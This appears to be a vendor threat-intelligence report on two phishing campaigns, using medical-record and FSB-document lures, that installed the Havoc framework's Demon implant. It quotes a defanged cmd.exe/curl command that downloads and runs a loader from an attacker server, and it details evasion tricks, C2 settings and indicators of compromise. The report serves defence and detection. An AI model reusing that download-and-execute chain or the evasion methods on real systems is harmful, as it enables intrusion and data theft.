Wreaking havoc in cyberspace: threat actors experiment with pentest tools
In recent months, adversaries have increasingly opted for the Havoc post‑exploitation framework. The tool is less popular compared to Cobalt Strike, Metasploit, and Sliver. According to BI.ZONE Threat Intelligence, this C2 framework is employed in an attempt to evade cybersecurity systems that may not flag an unknown program as malicious. For instance, such was the approach of the Mysterious Werewolf cluster that leveraged the Mythic framework in one of its campaigns.
In this research, we explore two campaigns based on the Havoc framework.
- Adversaries continue to seek alternatives to malware, frequently resorting to post‑exploitation frameworks.
- By using lesser known tools, attackers increase their chances of bypassing security systems.
- Phishing emails remain the most popular way of getting initial access as they provide a broader attack surface.
In July, BI.ZONE Threat Intelligence specialists discovered an archive Выписка амбулаторная Камильская.zip with the ISO file Документы Камильская.iso which in turn contained the LNK file Камильская А. Г.lnk. The names of the archive and its contents suggested that they contained an outpatient medical record and related documents. The opening of the LNK file triggered the execution of the command:
cmd.exe /c curl hxxp://87.242.107[.]147/Vipiska.doc -o C:\Users\Public\Documents\Vipiska.doc && curl hxxp://87.242.107[.]147/OneDriveUpdater.exe -o C:\Users\Public\Downloads\OneDriveUpdater.exe && start /min /B C:\Users\Public\Downloads\OneDriveUpdater.exe && start /B C:\Users\Public\Documents\Vipiska.doc && taskkill /F /IM cmd.exe
The said command performed the following actions:
- used cURL to download the decoy document from the server
87.242.107[.]147and stored it in the compromised system under the nameC:\Users\Public\Documents\Vipiska.doc - used cURL to download
OneDriveUpdater.exefrom the server87.242.107[.]147and stored the executable in the compromised system under the nameC:\Users\Public\Downloads\OneDriveUpdater.exe - ran the downloaded
OneDriveUpdater.exe - opened the decoy
Vipiska.doc - terminated the
cmd.exeprocess with the help oftaskkill
The decoy was an outpatient medical record (fig. 1).
Fig. 1. Extract from the decoy
OneDriveUpdater.exe was a PE32 executable written in C# that served as a loader. The file contained an encrypted payload, which it decrypted and ran in memory. Although OneDriveUpdater.exe had a Microsoft OneDrive icon, the file did not have a digital signature.
To prepare and run the malicious payload, the loader used the following WinAPI functions:
VirtualAllocExNumato allocate a memory region for the malicious payloadVirtualProtectto set/modify the protection options for memory regionsCreateThreadto create a thread for execution in the context of the running process
To obstruct analysis, the loader checked:
- code execution time: if the program “slept” less than 2.5 seconds out of 3 seconds (the set sleep value), it terminated
- name of the running process: if the name was other than
OneDriveUpdater, the program terminated
The loader contained two types of encrypted malicious payload: x86 and x64. Decrypting the payload required a double XOR with 32‑byte keys.
The malicious payload was a shellcode that launched a dynamic link library with the original name demon.x86.dll/demon.x64.dll. The library was a Demon implant of the Havoc framework. The implant’s configuration data is presented in table 1 below.
| Process to be implanted with malicious payload |
x86: "C:\Windows\SysWOW64\svchost.exe"x64: "C:\Windows\System32\svchost.exe" |
| C2 server |
87.242.107[.]147:443 |
| Server interaction method |
POST
|
| Headers |
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"Content-type: */*Host: microsoftonline[.]com |
We also discovered a similar sample of OneDriveUpdater.exe (SHA‑256: 189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569) with the identical PDB path. The loader also contained the Demon implant of the Havoc framework. In this case, 87.242.107[.]224 was used as the C2 server.
Our analysis of the C2 servers enabled us to find additional malicious files. We also discovered some previously unknown components of the C2 infrastructure (all the associated indicators of compromise are available on the BI.ZONE Threat Intelligence portal). The files included another decoy document, titled Medical.doc, that was a nearly exact copy of Vipiska.doc (fig.2), which proved that the files had been created by adversaries.
Fig. 2. Decoys compared
Analysis of the metadata suggested that the attackers used data stolen from a medical research center.
In August, BI.ZONE Threat Intelligence specialists discovered a phishing email (fig. 3).
Fig. 3. Phishing email
A link in the body of the email led to hxxp://inforussia[.]org/dokumenty.html that contained a malicious payload encoded in Base64 (Base64 outcome plus 35) (fig. 4).
Fig. 4. Extract from the HTML page
Clicking the link enabled the malicious payload to be saved in the compromised system as Dokumenty_FSB.exe. Written in C/C++, this PE32+ executable had a PDF icon and served as a loader. Its RCData contained a malicious payload encoded as IPv6 addresses separated by the characters 0D 0A and XOR encrypted with a key of 10,000 bytes. The loader decoded and decrypted the malicious payload in the memory and then ran it via a thread.
Similarly to the previous campaign, the malicious payload was a shellcode that launched a dynamic link library with the original name demon.x86.dll/demon.x64.dll. The library was a Demon implant of the Havoc framework. The implant’s configuration data is presented in table 2 below.
| Process to be implanted with malicious payload |
x86: "C:\Windows\SysWOW64\notepad.exe"x64: "C:\Windows\System32\notepad.exe" |
| C2 sever |
46.29.162[.]93:443 |
| Server interaction method |
POST
|
| Headers |
User-Agent: "Mozilla/5.0 (Windows NT 10) AppleWebKit/432.36 (KHTML, like Gecko)"Content-type: */* |
Выписка амбулаторная Камильская.zip
- MD5:
d970b9e0f46675098dbdd3082565c1c0 - SHA-1:
7388f62e8da9cdbcac4f5bc6b0dc41ff8f0056a9 - SHA-256:
88f83a7394c61b0e05432572ccbbacd1878dad0602c5459f98f46c265e63d8c7
Документы Камильская.iso
- MD5:
3273fb8b07627d8bf5aa4d45aa817ba5 - SHA-1:
14a8c1f7dd2ec5ac1faa8050acbb2fcdf7b8ac8c - SHA-256:
07ae355ebfafe21d81592b765053c48cf4a079d71b359b6a4d7f412b1dfb6374
Камильская А. Г.lnk
- MD5:
ac043785536df294f73f89040d4fc767 - SHA-1:
f0f6947cca25f01eda399a7fba1c23e11a0c3a15 - SHA-256:
48a579e8e48938f810fd6568e0d5c8ed6b3ec093f3c76a67f9c494224962a334
OneDriveUpdater.exe
- MD5:
31113f00145ab7d3773884f091407bed - SHA-1:
061d2d06ce1cabde79ee392645c3568df36fdf17 - SHA-256:
189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569
OneDriveUpdater.exe
- MD5:
14fa89384daab27b998d53efc1750a38 - SHA-1:
7f7313d8e9d18823a57ac7a329b9695f6fa7b962 - SHA-256:
7e3928a7f3300aedf261db5596cb7f2f6aac115240b010e25a3d53decde38fd0
dokumenty.html
- MD5:
8a21fe665d3f3a0e44f21e3381da067c - SHA-1:
ad6f413709c9e3af885233822a1aebd779bba7bc - SHA-256:
7c2f59d9790b816cb6f27a796d7c928046519f7429b7d2bbe53c60a7a55e22a7
Dokumenty_FSB.exe
- MD5:
f43dd2463e238ec7af4c63df87db6c73 - SHA-1:
bb92e0ca7eda4b866af872a4552e4df42bb28aba - SHA-256:
ac301b7698ac040f219eb8dfb248595a406b075d91f51116ef60d4dd9f5242ad
hxxp://inforussia[.]org
87.242.107[.]147
87.242.107[.]224
46.29.162[.]93
Campaign No. 1
| Tactic | Technique | Procedure |
|---|---|---|
| Execution |
Command and Scripting Interpreter: PowerShell |
Adversaries used malicious PowerShell scripts to execute the malicious payload in the memory of the running process |
|
Command and Scripting Interpreter: Windows Command Shell |
Adversaries used |
|
|
User Execution: Malicious File |
Adversaries used the malicious LNK file in the ISO archive to compromise the user |
|
| Defense Evasion |
Debugger Evasion |
Adversaries used the loader to check the name of the running process. If the name was other than |
|
Deobfuscate/Decode Files or Information |
Adversaries used the double XOR encrypted malicious payload which was decrypted by the loaders |
|
|
Obfuscated Files or Information: Embedded Payloads |
Adversaries embedded the obfuscated payload in the loaders |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
Adversaries encrypted the payload with a double XOR and embedded it in the body of the loaders |
|
|
Masquerading: Match Legitimate Name or Location |
Adversaries used the name |
|
|
Reflective Code Loading |
Adversaries reflectively loaded the malicious payload |
|
|
Virtualization/Sandbox Evasion: Time Based Evasion |
Adversaries checked the time of code execution |
|
| Discovery |
Process Discovery |
Adversaries got the name of the running process for later inspection |
|
Virtualization/Sandbox Evasion: Time Based Evasion |
Adversaries checked the time of code execution |
|
| Command and Control |
Application Layer Protocol: Web Protocols |
Adversaries used POST requests as a way for the Demon loader implant to communicate with the C2 server |
|
Ingress Tool Transfer |
Adversaries used cURL to download the malicious payload and the decoy document from the server |
Campaign No. 2
| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Link |
Adversaries sent out targeted phishing emails with a download link to the malicious program |
| Execution |
Command and Scripting Interpreter: JavaScript |
Adversaries used the malicious obfuscated JS code hosted on an HTML page of their server |
|
User Execution: Malicious Link |
Adversaries used malicious links for the user to download and run the malware |
|
|
User Execution: Malicious File |
Adversaries used EXE files with Adobe Acrobat Reader icons to compromise the user |
|
| Defense Evasion |
Debugger Evasion |
Adversaries used the loader to check the name of the running process. If the name was other than |
|
Deobfuscate/Decode Files or Information |
Adversaries used the malicious payload encoded as IPv6 addresses separated by the characters |
|
|
Obfuscated Files or Information: HTML Smuggling |
Adversaries implanted the malicious payload, which was an executable file, into HTML pages |
|
|
Obfuscated Files or Information: Dynamic API Resolution |
Adversaries used their own algorithm to hash the names of the WinAPI functions being called |
|
|
Obfuscated Files or Information: Embedded Payloads |
Adversaries embedded the obfuscated malicious payload in the loaders |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
Adversaries employed XOR to encrypt the malicious payload. They coded it as IPv6 addresses separated by the characters |
|
|
Masquerading: Match Legitimate Name or Location |
Adversaries used the name |
|
| Command and Control |
Application Layer Protocol: Web Protocols |
Adversaries used POST requests as a way for the Demon loader implant to communicate with the C2 server |
|
Ingress Tool Transfer |
Adversaries used the Havoc framework’s Demon implant, which was the next stage loader |
The examined malicious activity is detected by the following BI.ZONE EDR rules:
win_access_to_ti_observed_host_from_nonbrowserswin_execution_of_ti_observed_filewin_curl_download_and_execute_filewin_kill_cmd_processwin_suspicious_code_injection_to_system_processwin_possible_parent_process_spoofing
Phishing emails are the most popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.
Studying the current attack methods and tools is important for mapping the cyber threat landscape. To stay aware of the latest campaigns and methods used in attacks against specific infrastructures, we recommend dedicated portals such as BI.ZONE Threat Intelligence. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect from the most critical threats to the company.